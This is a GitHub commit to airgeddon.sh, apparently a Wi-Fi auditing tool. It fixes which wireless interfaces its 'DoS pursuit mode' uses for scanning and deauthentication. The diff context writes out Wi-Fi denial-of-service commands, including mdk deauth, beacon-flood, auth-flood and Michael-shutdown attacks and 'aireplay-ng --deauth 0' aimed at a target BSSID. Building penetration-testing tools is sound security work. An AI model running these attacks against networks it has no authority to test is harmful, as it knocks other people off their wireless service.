Skip to content

Commit

Permalink
Fix error on interfaces on "DoS pursuit mode"
Browse files Browse the repository at this point in the history
  • Loading branch information
v1s1t0r1sh3r3 committed Aug 15, 2023
1 parent c8558be commit 83f386a
Show file tree
Hide file tree
Showing 2 changed files with 10 additions and 9 deletions.
1 change: 1 addition & 0 deletions CHANGELOG.md
Original file line number Diff line number Diff line change
Expand Up @@ -2,6 +2,7 @@
- Chinese language translation added (Thank you to "zcbxx")
- Fixed bug parsing cracked PIN on WPS reaver Pixie Dust attack for newer reaver versions
- Fixed error on PMKID capturing due hcxdumptool different params for newer versions using bpf filters
- Fixed error on interfaces on "DoS pursuit mode"

### 11.20
- Improvements and fixes on "DoS pursuit mode"
Expand Down
18 changes: 9 additions & 9 deletions airgeddon.sh
Original file line number Diff line number Diff line change
Expand Up @@ -4392,7 +4392,7 @@ function launch_dos_pursuit_mode_attack() {
case "${1}" in
"${mdk_command} amok attack")
dos_delay=1
interface_pursuit_mode_scan="${interface}"
interface_pursuit_mode_scan="${secondary_wifi_interface}"
interface_pursuit_mode_deauth="${interface}"
manage_output "+j -bg \"#000000\" -fg \"#FF0000\" -geometry ${g1_topleft_window} -T \"${1} (DoS Pursuit mode)\"" "${mdk_command} ${interface_pursuit_mode_deauth} d -b ${tmpdir}bl.txt -c ${channel}" "${1} (DoS Pursuit mode)"
if [ "${AIRGEDDON_WINDOWS_HANDLING}" = "tmux" ]; then
Expand All @@ -4404,7 +4404,7 @@ function launch_dos_pursuit_mode_attack() {
"aireplay deauth attack")
${airmon} start "${interface}" "${channel}" > /dev/null 2>&1
dos_delay=3
interface_pursuit_mode_scan="${interface}"
interface_pursuit_mode_scan="${secondary_wifi_interface}"
interface_pursuit_mode_deauth="${interface}"
manage_output "+j -bg \"#000000\" -fg \"#FF0000\" -geometry ${g1_topleft_window} -T \"${1} (DoS Pursuit mode)\"" "aireplay-ng --deauth 0 -a ${bssid} --ignore-negative-one ${interface_pursuit_mode_deauth}" "${1} (DoS Pursuit mode)"
if [ "${AIRGEDDON_WINDOWS_HANDLING}" = "tmux" ]; then
Expand All @@ -4415,7 +4415,7 @@ function launch_dos_pursuit_mode_attack() {
;;
"wids / wips / wds confusion attack")
dos_delay=10
interface_pursuit_mode_scan="${interface}"
interface_pursuit_mode_scan="${secondary_wifi_interface}"
interface_pursuit_mode_deauth="${interface}"
manage_output "+j -bg \"#000000\" -fg \"#FF0000\" -geometry ${g1_topleft_window} -T \"${1} (DoS Pursuit mode)\"" "${mdk_command} ${interface_pursuit_mode_deauth} w -e ${essid} -c ${channel}" "${1} (DoS Pursuit mode)"
if [ "${AIRGEDDON_WINDOWS_HANDLING}" = "tmux" ]; then
Expand All @@ -4426,7 +4426,7 @@ function launch_dos_pursuit_mode_attack() {
;;
"beacon flood attack")
dos_delay=1
interface_pursuit_mode_scan="${interface}"
interface_pursuit_mode_scan="${secondary_wifi_interface}"
interface_pursuit_mode_deauth="${interface}"
manage_output "+j -bg \"#000000\" -fg \"#FF0000\" -geometry ${g1_topleft_window} -T \"${1} (DoS Pursuit mode)\"" "${mdk_command} ${interface_pursuit_mode_deauth} b -n ${essid} -c ${channel} -s 1000 -h" "${1} (DoS Pursuit mode)"
if [ "${AIRGEDDON_WINDOWS_HANDLING}" = "tmux" ]; then
Expand All @@ -4437,7 +4437,7 @@ function launch_dos_pursuit_mode_attack() {
;;
"auth dos attack")
dos_delay=1
interface_pursuit_mode_scan="${interface}"
interface_pursuit_mode_scan="${secondary_wifi_interface}"
interface_pursuit_mode_deauth="${interface}"
manage_output "+j -bg \"#000000\" -fg \"#FF0000\" -geometry ${g1_topleft_window} -T \"${1} (DoS Pursuit mode)\"" "${mdk_command} ${interface_pursuit_mode_deauth} a -a ${bssid} -m -s 1024" "${1} (DoS Pursuit mode)"
if [ "${AIRGEDDON_WINDOWS_HANDLING}" = "tmux" ]; then
Expand All @@ -4448,7 +4448,7 @@ function launch_dos_pursuit_mode_attack() {
;;
"michael shutdown attack")
dos_delay=1
interface_pursuit_mode_scan="${interface}"
interface_pursuit_mode_scan="${secondary_wifi_interface}"
interface_pursuit_mode_deauth="${interface}"
manage_output "+j -bg \"#000000\" -fg \"#FF0000\" -geometry ${g1_topleft_window} -T \"${1} (DoS Pursuit mode)\"" "${mdk_command} ${interface_pursuit_mode_deauth} m -t ${bssid} -w 1 -n 1024 -s 1024" "${1} (DoS Pursuit mode)"
if [ "${AIRGEDDON_WINDOWS_HANDLING}" = "tmux" ]; then
Expand All @@ -4460,7 +4460,7 @@ function launch_dos_pursuit_mode_attack() {
"${mdk_command}")
dos_delay=1
interface_pursuit_mode_scan="${secondary_wifi_interface}"
interface_pursuit_mode_deauth="${secondary_wifi_interface}"
interface_pursuit_mode_deauth="${iface_monitor_et_deauth}"
manage_output "+j -bg \"#000000\" -fg \"#FF0000\" -geometry ${deauth_scr_window_position} -T \"Deauth (DoS Pursuit mode)\"" "${mdk_command} ${interface_pursuit_mode_deauth} d -b ${tmpdir}\"bl.txt\" -c ${channel}" "Deauth (DoS Pursuit mode)"
if [ "${AIRGEDDON_WINDOWS_HANDLING}" = "tmux" ]; then
get_tmux_process_id "${mdk_command} ${interface_pursuit_mode_deauth} d -b ${tmpdir}\"bl.txt\" -c ${channel}"
Expand All @@ -4470,7 +4470,7 @@ function launch_dos_pursuit_mode_attack() {
;;
"Aireplay")
interface_pursuit_mode_scan="${secondary_wifi_interface}"
interface_pursuit_mode_deauth="${secondary_wifi_interface}"
interface_pursuit_mode_deauth="${iface_monitor_et_deauth}"
iw "${interface_pursuit_mode_deauth}" set channel "${channel}" > /dev/null 2>&1
dos_delay=3
manage_output "+j -bg \"#000000\" -fg \"#FF0000\" -geometry ${deauth_scr_window_position} -T \"Deauth (DoS Pursuit mode)\"" "aireplay-ng --deauth 0 -a ${bssid} --ignore-negative-one ${interface_pursuit_mode_deauth}" "Deauth (DoS Pursuit mode)"
Expand All @@ -4483,7 +4483,7 @@ function launch_dos_pursuit_mode_attack() {
"Wds Confusion")
dos_delay=10
interface_pursuit_mode_scan="${secondary_wifi_interface}"
interface_pursuit_mode_deauth="${secondary_wifi_interface}"
interface_pursuit_mode_deauth="${iface_monitor_et_deauth}"
manage_output "+j -bg \"#000000\" -fg \"#FF0000\" -geometry ${deauth_scr_window_position} -T \"Deauth (DoS Pursuit mode)\"" "${mdk_command} ${interface_pursuit_mode_deauth} w -e ${essid} -c ${channel}" "Deauth (DoS Pursuit mode)"
if [ "${AIRGEDDON_WINDOWS_HANDLING}" = "tmux" ]; then
get_tmux_process_id "${mdk_command} ${interface_pursuit_mode_deauth} w -e ${essid} -c ${channel}"
Expand Down

0 comments on commit 83f386a

Please sign in to comment.